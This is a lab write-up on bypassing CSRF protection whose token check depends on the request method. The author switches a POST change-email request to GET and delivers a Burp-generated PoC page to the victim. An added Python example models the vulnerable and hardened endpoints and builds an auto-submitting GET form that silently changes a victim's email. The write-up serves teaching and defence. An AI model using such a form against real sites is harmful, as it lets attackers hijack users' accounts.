This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.
To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.
You can log in to your own account using the following credentials: wiener:peter
After logging in with the provided credentials, I intercepted the change-email request and sent it to Repeater:
I noticed that there is a CSRF token included in the request to protect against CSRF attacks. Initially, I tried creating a CSRF PoC and sending it to the victim, but it didn't work. Given the lab title, which hinted that token validation might depend on the request method, I decided to change the POST request to a GET request. Then, I generated a new CSRF PoC and sent it to the victim.
Here is the modified GET request:
By right-clicking the request and selecting Engagement tools / Generate CSRF PoC, I generated the following HTML:
I modified the email value to a new one to avoid any errors related to reused email addresses. After copying the CSRF PoC, I placed it in my malicious page on the exploit server.
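To make the bypass concrete, here is an added example (not the lab's server code, not Burp's generated output, and not the author's): a toy model of a change-email endpoint that validates the CSRF token only for POST requests, the hardened version that rejects GET outright and always checks the token, and a builder for the auto-submitting GET form a CSRF PoC page hosts. It covers both the reasoning about method-dependent validation above and the PoC step just described. The placeholder URL, the token values and the victim session are all constructed for the example.

```python
# Added example: toy model of a change-email endpoint whose CSRF-token check
# depends on the request method, a hardened version, and the GET-based PoC page.
# Not the lab's code or Burp's output; the URL, names and tokens are assumptions.
from dataclasses import dataclass
from html import escape

# Placeholder target; a real lab has its own host name.
LAB_URL = "https://LAB-ID.web-security-academy.net/my-account/change-email"


@dataclass
class Session:
    """Victim's cookie-authenticated session; the CSRF token is bound to it."""
    user: str
    email: str
    csrf_token: str


@dataclass
class Request:
    """Method, parameters (query string for GET, form body for POST) and the
    session the browser attached through the cookie."""
    method: str
    params: dict
    session: Session


def vulnerable_change_email(req: Request) -> int:
    """Mirrors the lab: the token is validated for POST only, so the same
    parameters sent as a GET skip the check entirely."""
    if req.method == "POST" and req.params.get("csrf") != req.session.csrf_token:
        return 400  # Invalid CSRF token
    if "email" not in req.params:
        return 400  # Missing parameter 'email'
    req.session.email = req.params["email"]
    return 302  # redirect back to /my-account


def hardened_change_email(req: Request) -> int:
    """State-changing action: only POST is accepted, and the token is always checked."""
    if req.method != "POST":
        return 405  # Method Not Allowed: a GET must never change state
    if req.params.get("csrf") != req.session.csrf_token:
        return 400
    if "email" not in req.params:
        return 400
    req.session.email = req.params["email"]
    return 302


def build_get_csrf_poc(target_url: str, params: dict) -> str:
    """Auto-submitting GET form in the shape Burp's 'Generate CSRF PoC' produces.
    The victim's browser attaches the session cookie, so no valid token is needed."""
    inputs = "\n".join(
        f'      <input type="hidden" name="{escape(k)}" value="{escape(v)}" />'
        for k, v in params.items()
    )
    return (
        "<html>\n  <body>\n"
        f'    <form action="{escape(target_url)}" method="GET">\n{inputs}\n'
        '      <input type="submit" value="Submit request" />\n    </form>\n'
        "    <script>\n      history.pushState('', '', '/');\n"
        "      document.forms[0].submit();\n    </script>\n  </body>\n</html>\n"
    )


def simulate(handler) -> tuple:
    """Replay the attacker's GET against a fresh victim session. The csrf
    parameter carries a stale attacker token, as it does when Burp's
    'Change request method' moves the POST body into the query string."""
    victim = Session("wiener", "wiener@normal-user.net", "victim-token-0001")
    params = {"email": "attacker@evil-user.net", "csrf": "attacker-token-9999"}
    status = handler(Request("GET", params, victim))
    return status, victim.email


if __name__ == "__main__":
    print(build_get_csrf_poc(LAB_URL, {"email": "attacker@evil-user.net"}))
    print("vulnerable:", simulate(vulnerable_change_email))  # (302, 'attacker@evil-user.net')
    print("hardened:  ", simulate(hardened_change_email))    # (405, 'wiener@normal-user.net')
```

The check a practitioner takes away from this: the token bound to the session must be verified for every request that changes state, and GET should not be allowed to change state at all, since a GET with the victim's cookie is exactly what an attacker-hosted page can trigger.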
By clicking Store and then Deliver exploit to victim, I saw that the lab was solved, confirming the change of the victim's email.